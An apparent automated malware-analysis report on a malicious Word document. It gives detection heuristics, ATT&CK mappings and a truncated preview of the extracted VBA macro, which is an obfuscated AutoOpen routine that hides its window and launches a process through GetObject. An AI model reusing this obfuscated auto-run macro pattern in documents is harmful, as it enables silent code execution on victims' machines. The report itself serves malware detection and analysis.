MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The macro utilizes the GetObject function, a common technique for executing arbitrary code. The presence of the 'autoopen' macro and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic strongly indicate that this macro is intended to run automatically upon opening the document, likely to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics 7
-
ClamAV: Doc.Malware.Drsm-6931167-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Drsm-6931167-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12930 bytes |
SHA-256: 9beeb52075c9b54285be2f34dbe53b1e7183d443772ab82e1ae675b30b3df91c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WDZAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "tAkZXAAC"
Attribute VB_Base = "0{27559CE0-4ADD-4651-8A72-5EF4E7B87ED4}{2B9866C6-C610-41B4-855E-D879134083F9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "GQ4BBAG"
Sub autoopen()
On Error Resume Next
If YADZ1CAA = C_koXAox Then
HQoXCcA = 949716526 - SAcAABG
L14AAU = bBAwDB + Oct(v_oB1ZB1) / 103137739 * 476416608
Set QAAG1Ak = lB_ACAk
zAAxwk = (774912242 + 12987836 * X1UBAUAA + CInt(214769836) + jAQAX4UQ / mQc_BA1)
u1QUAwx = 250863470
End If
If cAGoA_AA = ZDQcAGU Then
DDcQck = 517508998 - McGX4wC
FAc_X4A = vAAkAD + Oct(sBUGQA) / 948888026 * 268107932
Set z1ZQAB = Qw4AU_B
t1kABX1 = (378022218 + 379747760 * RDxX4Zkk + CInt(745173365) + VCQQQUC / EowDcA)
GXAGDD1 = 957844032
End If
If IkG4ZB = r4AcA1Q Then
FGAAkCA = 187959857 - Z_AcUxDA
PkXc_AA = wACZQQA + Oct(DXUUwA) / 510838716 * 869933082
Set icAkwDA = IGB1D4A
zk_wDAD = (358716164 + 183140443 * dZ4DxwBZ + CInt(193310753) + mQGZAw / pAccAA)
jXAoAAD = 939460184
End If
Set OXwACX_ = GetObject(tAkZXAAC.fAZDAQAA)
If JADZBAAk = G_CGCAB Then
PAoACQZA = 259727621 - YBACQCxG
QAoQBA = jUA1B4 + Oct(fUCAXA) / 595795163 * 801833251
Set dckcAA = zAx1DkA
qAX11Aw = (352885041 + 610447034 * GZADAB + CInt(852755668) + kAABA4 / RAAABw)
oxADoA = 442408147
End If
If IQZQAoUB = iZABCA Then
RABAAo = 718995697 - iAwAADG
QBQBA4 = KAAAZDA + Oct(scAoAA) / 681636774 * 298105799
Set w1AkCXA4 = ZDwCwGD
EBAADZ = (697545678 + 259143160 * oDQGGokA + CInt(511079189) + tQAAAA / icAAcxU)
K4AAXAA = 379605263
End If
If OA4xGAAQ = bQUADX Then
MABG_GBx = 133074579 - j_QUBA
L_1U1A1A = dQAAUA4 + Oct(iAAAkc1) / 332152410 * 778723251
Set rAcwAU = cAXAZB
zoA_AA = (324568078 + 789165252 * qXAc1Z + CInt(526513862) + mQA_AUZ / UZADBUA)
O1XZXA = 190851030
End If
OXwACX_.ShowWindow = 894348 - 894348
If NGXZAkDG = CUAAX4cZ Then
EAUwCAkA = 897965360 - qwAUDQ
qkDwUw = dAAAXAA + Oct(wcQAxXQ) / 155181644 * 580970701
Set MAAAUU = AZxxoABA
DZAXXUBA = (875305154 + 807337377 * DkcoAC + CInt(597511585) + pABAcCc / XAAXQAUA)
ZAQXAA_ = 902660714
End If
If sxADA_k = hcGUAC Then
jXQQQA = 53836548 - zUAAAB
EUCwGAo = BBAABQwA + Oct(uAAoG_A) / 517179942 * 387326010
Set uAAAAQAA = jAQkXGBU
ZoADAQQ = (283683574 + 773266364 * ZwAkUAxA + CInt(980417349) + wAw4QA_Q / Jc_xAD)
AAAZXXBc = 995651421
End If
If MBAXxc = jwAAckAQ Then
cXZUDQ = 946798449 - sAxUX_
GoCQUUAB = bAAQ1ck + Oct(hB_1ADA) / 596669736 * 253066424
Set MDAwZAAG = kQXcAAAA
PAxUAG = (581362481 + 688120926 * pQXDAXU + CInt(508201260) + SAwGC11 / mBAAAQAA)
rDCwGc = 156267673
End If
GetObject(tAkZXAAC.QAAwAAA1).Create% jAo_AA + tAkZXAAC.FXBXZAQD + K_4UADZ + tAkZXAAC.mA_AADD + iAZXZXZX + tAkZXAAC.WAQDBwA + iAQACG, OAAABAQw, OXwACX_, w_AADB1A
If RXDDoAAU = C_GQ1X Then
BCAABBxA = 168386157 - VkXXQ1B
zAXxwUQk = rwAX_AQQ + Oct(RABUXDAo) / 287978487 * 904750880
Set XBBQAwBX = FAA1DCUk
wCDQUZBA = (487132587 + 909042658 * jkQQAU1 + CInt(281592087) + C_AAAox / IA_AQX)
MUAUoA = 689042967
End If
If IAAAQA = RkGGUQUA Then
hAXUQUU = 404696370 - Dx_ZAwAD
uAko1Qo = kDA1AACA + Oct(EADxA41) / 658690521 * 183236645
Set ZDADAw = WxBB4A
mAGAU4A = (817045454 + 508840172 * jAckUAA + CInt(208041784) + wG4xZcZ / nUDCB4)
noQkBw = 822766977
End If
If lDAAkDQ = lAAxADU_ Then
Do_AAAZx =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.